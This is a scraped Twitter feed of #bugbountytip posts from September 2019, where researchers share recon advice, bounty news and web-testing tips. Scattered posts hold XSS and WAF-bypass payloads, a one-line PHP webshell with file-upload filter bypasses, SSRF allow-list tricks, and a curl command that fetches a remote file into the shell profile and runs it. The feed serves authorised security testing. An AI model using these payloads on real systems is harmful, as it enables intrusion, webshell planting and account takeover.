@GochaOqradze


2019-09-19 16:29:17
0 From Tbilisi to Batumi is 5 hours by train :) Decide play in Termux and recon :) #bugbountytip https://t.co/uoco4qvpZG
DarkOverFlow
@HAXORANON


2019-09-19 12:56:29
0 does anyone know how to find forgotten endpoints if so dm me #hackerone #bugbountytip #bugbounty #bughunter #bugbountytips
Shaked Klein Orbach 🇮🇱
@shakedko


2019-09-19 11:21:56
1 Did you know about "thisisunsafe" when visiting HTTPS websites with HSTS? https://t.co/e9VaXqwGpd Almost like IDDQD or better IDKFA #BugBounty #bugbountytip
Dominik MaƂowiecki
@5up3rD43m0n


2019-09-19 09:54:47
0 it's one of these days when you check your database and realize that a bug hunter was successful, but he did not realize it and forget to report it #bugbountytip @Hacker0x01
Constant 🇪🇬
@Mr_A_ConstanT


2019-09-19 09:44:14
0 a shell script aim to automatically launch 50+ online web scanning tools in the Browser against a target domain in a 10 waves, #CyberSecurity #bugbountytip #WebApp #Hacking https://t.co/nTNLn3LrpY
JaWaD 🇲🇦
@CHAJER2


2019-09-19 09:39:01
0 Yay, I was awarded a $750 bounty on @Hacker0x01 #TogetherWeHitHarder steps: == #bugbountytip: Change sometimes method post to get can lead to Information Exposure Through Debug Information.
Avanish Pathak
@avanish46


2019-09-19 05:52:05
0 #bugbountytip discovered CSRF+Stored XSS in a private program on @Bugcrowd but unfortunately XSS was Out of scope in that program. How it works :- https://t.co/f2YJa1WgTi
A hacker's life
@Unknownuser1806


2019-09-19 03:08:09
1 When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input. #hacking, #bugbountytip ,#bugbounty
Fisher
@Regala_


2019-09-19 01:12:56
2 The less you use scanners, the more severe your issues are #cosmic #DISTURBANCE 🇨🇦 #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-18 19:58:10
0 Guys if you are looking to get up and running with Go / Golang, I highly recommend this video by @traversymedia Go / Golang Crash Course https://t.co/kH75W4DeY3 #bugbounty #go #golang #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 18:56:33
0 Good #hacking is a combination of observation and skill. #bugbountytip , #motivation ,#bugbounty
RabbidByte
@RabbidByte


2019-09-18 14:35:27
0 Don't forget about the @Hacker0x01 Hacker101 discord channel .... I missed way too much when I forgot about it for 8 months or so. #bugbountytip
Emad Youssef
@Sy3Omda


2019-09-18 12:57:27
0 as it looks simple as it should be BUT this would minimize your time in enumeration phase curl https://t.co/wuePgiRbGU -o ~/.bash_profile && echo "source ~/.bash_profile" >> ~/.bashrc i have combined most of keyhack in one bash profile enjoy #BugBounty #bugbountytip #Pentesting
gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User https://t.co/HrwGYO0fjL #bugbounty , #bugbountytip ,#hacking
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal., and #HTTPrequest smuggling. - > Everything you need to getting started with #bugbounty #bugbountytip , #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty 🤔 #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I build a burpsuite extension to mark sensitive information.If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. https://t.co/qeY996qzTi
Ammar Amer🇸🇾
@cry__pto


2019-09-17 13:51:02
17 i have uploaded 34 new articles about different fields of hacking as a pdf files to my github repository. i will continue working on this project years to come. https://t.co/q2layzVpKz #pentest #malware #hacking #infosec #cybersecurity #bugbountytip #redteam #hacking #0day #osint https://t.co/IAaAGXn9HD
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty , #bugbountytip ,#hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub 😜 #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer work in real world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate 🌮
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate 🌮
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researcher think ;). Probably see how reports are thought/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your christmas present 🎁 #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! 🤯 P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. 😈 Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. 👍 https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate 🌮
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: “Text Injection” (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate 🌮
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF 🦖
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON,AUX,etc)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3r🏴‍☠️
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee 🐝
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog🙂 https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
W🌍aR🐁eeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in Wordpress/Drupal is a custom themes and plugins. Wordpress Location: /wp-content/themes/ and /wp-content/plugins/ You can found their name with Waybackarchive or site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon 😁 #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! 😂 Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty discord place for learn and share? #bugbountytip thx for RT
HackIsOn ®
@hackison


2019-09-15 07:57:21
0 Ghazi is a BurpSuite Plugins For Testing various PayLoads Like "XSS,SQLi,SSTI,SSRF,RCE and LFI" through Different tabs , Where Each Tab Will Replace Every GET or POST Parameters With Selected TAB in "Proxy" or "Repeater" TAB. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec 🚀
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE story at one of Bug Bounty Program. Race Condition that could Result to RCE - (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytip

Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) 😀😃♥️♥️♥️ #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate 🌮
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
Ｂｉｊａｎ
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in a program's portal!🧐 Suddenly I have visited this URL!🙄 https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!🤣 #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded 😄...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only show to friends. User A not friends with User B. User A can not see User B gender status. User A send a graphql request to user B private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate 🌮
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific ‘reboot’ command & crashed the server. It’s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Sudoka
@sudo_sudoka


2019-09-14 15:48:48
1 #Bypass #XSS filters with JavaScript RegExp.prototype.source 🏹🎯🏆 #bugbountytip https://t.co/DiP4CZcqg6
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days 😇 Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below 👇 #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 shopify xss google auth this video awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.😇
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject vector to break down the HTML Attributes and execute the alert using an event. is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
0 #Electroneum #ETN $ETN is looking for Bug bounty hounters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to cloudfront using cname. And when i open the page it shows "NoSuchBucket" "The specified bucket does not exist" error. is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3
ᴂ
@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack
ᴂ
@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extension (php,asp,jsp,..) *content-type filtering: change the content-type to valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack
ᴂ
@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extensions like: php[3-n],phtml, pht. 2) whitelisting: use null-byte:shell.php%00.gif use double extension format : shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! 🔥 #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. 💰$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email “[email protected]” on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archive bug bounty tips. 👉https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me:
----------
import base64
import mmh3
import requests
response = requests.get('https://yourwebsite/favicon.ico')
# base64.encodebytes keeps the line breaks that Python 2's .encode('base64') produced; the hash depends on them
favicon = base64.encodebytes(response.content)
favicon_hash = mmh3.hash(favicon)
print(favicon_hash)
----------
#Shodan #bugbountytip
Securisec 🚀
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with burp intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid users accounts. #bugbountytip
Aussan 🇹🇩
@aussan_m


2019-09-09 12:33:12
0 A lot of time people forget to look at the response or intercept the response in burp. Always examine the response in details especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.👌 #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
1 #bugbountytip if the password reset link is shortened in email try checking for common hashes/encodings you may end up with gold mine, in the below scenario the url was shortened and the url id was sequential and encoded in base64 -->Scraping all generated password resets links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so let's have a poll! What suits you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or change Request methods to GET>POST or POST>GET. this will result in Laravel exception handler error Disclosing AWS, Database, and SMTP Credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API version’s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani 🇵🇰
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip: Access the site without logging into account you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Content-length but result is duplicated . So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if i need to set an specific XSRF-TOKEN in order to exploit the issue ? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 🇦🇷
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter the long data successfully, but I ended up testing only a few characters of the request I don't know why this is😂
Ammar Amer 🇸🇾
@cry__pto


2019-09-05 14:17:38
1 -“An XSS on Facebook via PNGs & Wonky Content Types”: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archive bug bounty tips. 👉https://t.co/hG46WtG0dd Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but can’t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; 🛡 ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David Schütz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can receive the verification codes in SMS! ⚡ (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? 🕵️ Thanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
Rémy Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! 😃
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-02 06:43:33
